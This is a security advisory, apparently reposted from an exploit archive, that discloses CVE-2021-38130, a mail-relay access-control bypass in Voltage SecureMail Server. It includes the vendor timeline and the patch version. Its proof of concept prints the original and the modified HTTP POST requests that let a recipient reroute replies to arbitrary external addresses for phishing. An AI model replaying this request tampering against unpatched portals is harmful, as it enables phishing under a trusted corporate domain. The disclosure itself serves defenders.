Voltage SecureMail Server Business Logic Bypass

2022.02.07
Credit: TING Meng Yean
Risk: High
Local: No
Remote: Yes
CVE: CVE-2021-38130
CWE: CWE-284


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Security Advisory ======================================================================= title: Business Logic Bypass - Mail Relay (Post-authenticated) product: Voltage SecureMail Server vulnerable version: Voltage SecureMail Server <v7.3.0.1 fixed version: Voltage SecureMail Server v7.3.0.1 CVE number: CVE-2021-38130 impact: Medium homepage: https://www.microfocus.com/en-us/cyberres/data-privacy-protection/secure-mail found: 2021-06-25 by: TING Meng Yean (GIS Red Team) United Overseas Bank Limited (UOB) ======================================================================= Vendor description: ------------------- Voltage SecureMail simplifies compliance to privacy regulations, including MA, PCI, HITECH, UK FSA, and EU Data privacy directives, and mitigates the risk of email security breaches. Voltage SecureMail provides end-to-end security for email and attachments, inside the enterprise to the desktop, at the enterprise gateway, and across leading mobile smartphones and tablets. The solution provides the confidence and peace of mind that sensitive data is protected in transit and in storage, wherever it is in an email system to any inbox (e.g., Outlook, Lotus Notes, Gmail, and Yahoo!), without disrupting existing email services or business processes. Source: http://www.securemailworks.com/SecureMail.asp Business recommendation: ------------------------ The vendor provides a patch and users of this product are urged to upgrade to the latest version available. Reference: https://portal.microfocus.com/s/article/KM000003667 An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: ----------------------------------- Business Logic Bypass - Mail Relay (Post-authenticated) - CVE CVE-2021-38130 - CWE-284: Improper Access Control - CVSSv3: 5.4 (Medium) https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N Voltage SecureMail is an email protection service that provides email encryption. With each secure email, there is an HTML attachment named "message_zdm.html" that furnishes access to the Zero Download Messenger (ZDM), which can be a web portal or mobile app. The encrypted body of the original message as well as any attachments to the original email is contained within this attachment. The email recipient needs to install Voltage SecureMail app (for mobile) or browse to the Voltage SecureMail Server portal (desktop) to authenticate and view any secure email and attachments sent via ZDM. When the recipient opens the "message_zdm.html" file for the first time on a desktop, the browser is brought to the corporation's SecureMail portal where the user has to create a password in order to continue. An email verification email is sent to the recipient with a One Time Link, and the recipient can read the email on the SecureMail portal after clicking on the link. If the recipient opens the "message_zdm.html" file again in the future, the recipient has to input the previously created password. When viewing the email on the SecureMail portal, the recipient can choose to reply to the email by clicking "Reply" or "Reply to All". The SecureMail portal only allows the recipient to reply to the original email sender and to the email addresses in the Cc/Bcc list. However, it is possible to modify the original email addresses in the "to", "cc" or "bcc" fields, or to add arbitrary email addresses, by sending a special POST request. As the SecureMail portal displays the logo and valid SSL certificate of the corporation in use, an attacker who have received a SecureMail encrypted email previously can make use of the SecureMail portal to send phishing emails to third parties. Note that the attacker is unable to spoof the "from" address, so the emails to third parties will be from the attacker's email address. Proof of concept: ----------------- When the recipient replies to the email by clicking "Reply" or "Reply to All", the recipient is brought to the "Compose New Message" page. To send the email reply, the recipient then clicks on the "Send Secure" button. The SecureMail portal does not allow the modification of the "to", "cc" or "bcc" field if the user attempts to intercept the POST request after clicking on the "Send Secure" button. However, if the user attempts to intercept the POST request after clicking on the "Plain Text" button, the modification of the "to", "cc" or "bcc" field is successful. The modified email is then successfully sent out after the user click on the "Send Secure" button. It is noted that there is one difference in the POST request parameters between a "Send Secure" and "Plain Text" that allows the "to", "cc" and "bcc" fields to be modified, and the difference is the "send" versus "x" parameters. The rest pf the contents of the "Send Secure" and "Plain Text" POST requests are almost identical. Original "Send Secure" Request ######################################################################## POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1 Host: <...snipped...> Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...> Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372 Te: trailers -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="CSRFToken" <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="c" c3 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="h" h924481124 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="send" send -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="senderKeyEnc" <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="to" original.sender@corp.com -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="showCcEnabled" on -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="cc" -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="bcc" -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="subject" RE: <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="attachment"; filename="" Content-Type: application/octet-stream -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="editModeToggle" 0 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="body" <...snipped...> -----------------------------289584800395870328816642372 ######################################################################## Modified "Plain Text" request ######################################################################## POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1 Host: <...snipped...> Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...> Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372 Te: trailers -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="CSRFToken" <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="c" c3 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="h" h924481124 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="x" x -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="senderKeyEnc" <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="to" victim1@external.com -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="showCcEnabled" on -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="cc" victim2@external.com -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="bcc" victim3@external.com -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="subject" RE: <...snipped...> -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="attachment"; filename="" Content-Type: application/octet-stream -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="editModeToggle" 1 -----------------------------289584800395870328816642372 Content-Disposition: form-data; name="body" <...snipped...> -----------------------------289584800395870328816642372-- ######################################################################## As of the patched Voltage SecureMail Server version 7.3.0-259490, the vulnerability for the "Plain Text" was no longer replicable. However, the same vulnerability can be replicated using the "Attach" function. Vulnerable / tested versions: ----------------------------- The following version has been tested and found to be vulnerable: * 7.3 * 7.3.0-259490 Vendor contact timeline (GMT+8): -------------------------------- 2021-06-25: Contacting vendor through their SecureMail product support team. 2021-06-28: Contacting Micro Focus Product Security Response Team (PSRT) security@microfocus.com to request for CVE number. 2021-06-29: Micro Focus PSRT opened PSRT case 80358. 2021-07-02: SecureMail product support team confirmed the vulnerability and working on patch. 2021-07-31: SecureMail product support team released test patch v7.3.0-259490. 2021-08-04: Confirmed vulnerability "Plain Text" function was no longer replicable, but the same vulnerability can be replicated using the "Attach" function. Notified the SecureMail product support team. 2021-11-11: SecureMail product support team released patch v7.3.0.1. 2022-01-21: Requested Micro Focus PSRT for updates. 2022-01-24: Micro Focus PSRT responded with assigned CVE number. 2022-01-29: Micro Focus PSRT published security bulletin. 2022-02-03: Coordinated release of security advisory. Solution: --------- According to the vendor, Voltage SecureMail resolved this vulnerability in the version 7.3.0.1 patch release and customers should contact their support representative for information about downloading and applying the patch. Security Bulletin URL: ---------------------- https://portal.microfocus.com/s/article/KM000003667 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Meng Yean TING (GIS Red Team) United Overseas Bank Limited (UOB) -----BEGIN PGP PUBLIC KEY BLOCK----- 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 JMIzsDM4+GTLxyZrv4jCloLk9g== =nECi -----END PGP PUBLIC KEY BLOCK----- UOB EMAIL DISCLAIMER Any person receiving this email and any attachment(s) contained, shall treat the information as confidential and not misuse, copy, disclose, distribute or retain the information in any way that amounts to a breach of confidentiality. If you are not the intended recipient, please delete all copies of this email from your computer system. As the integrity of this message cannot be guaranteed, neither UOB nor any entity in the UOB Group shall be responsible for the contents. Any opinion in this email may not necessarily represent the opinion of UOB or any entity in the UOB Group.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top